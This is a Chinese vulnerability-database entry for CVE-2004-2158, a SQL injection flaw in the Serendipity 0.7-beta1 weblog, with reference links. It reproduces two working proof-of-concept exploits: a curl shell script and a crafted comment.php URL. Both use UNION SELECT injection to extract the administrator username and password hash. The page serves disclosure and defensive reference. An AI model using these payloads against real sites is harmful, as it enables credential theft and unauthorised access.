Serendipity多个输入验证漏洞

Serendipity多个输入验证漏洞

漏洞ID 1108201 漏洞类型 SQL注入
发布时间 2004-09-28 更新时间 2005-10-20
图片[1]-Serendipity多个输入验证漏洞-安全小百科CVE编号 CVE-2004-2158
图片[2]-Serendipity多个输入验证漏洞-安全小百科CNNVD-ID CNNVD-200412-1066
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/561
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1066
|漏洞详情
Serendipity0.7-beta1版本存在SQL注入漏洞。远程攻击者可以借助到(1)exit.php,或(2)comment.php的entry_id参数执行任意SQL命令。
|漏洞EXP
Proof of Concept 1
------------------


Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog


ser_sqli_poc.sh
---------8<-----------8<-------------
#!/bin/sh


echo -n "Username: "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
echo -n "MD5(password): "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
---------8<-----------8<-------------




Proof of Concept 2
------------------


Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.

http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*

# milw0rm.com [2004-09-28]
|参考资料

来源:XF
名称:serendipity-sql-injection(17533)
链接:http://xforce.iss.net/xforce/xfdb/17533
来源:BID
名称:11269
链接:http://www.securityfocus.com/bid/11269
来源:SECTRACK
名称:1011448
链接:http://securitytracker.com/id?1011448
来源:SECUNIA
名称:12673
链接:http://secunia.com/advisories/12673/
来源:FULLDISC
名称:20040928Serendipity0.7-beta1SQLInjectionPoC
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-September/026955.html
来源:OSVDB
名称:10371
链接:http://www.osvdb.org/10371
来源:OSVDB
名称:10370
链接:http://www.osvdb.org/10370

相关推荐: PowerDownload IncDir Remote File Include Vulnerability

PowerDownload IncDir Remote File Include Vulnerability 漏洞ID 1096534 漏洞类型 Input Validation Error 发布时间 2005-05-31 更新时间 2005-05-31 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享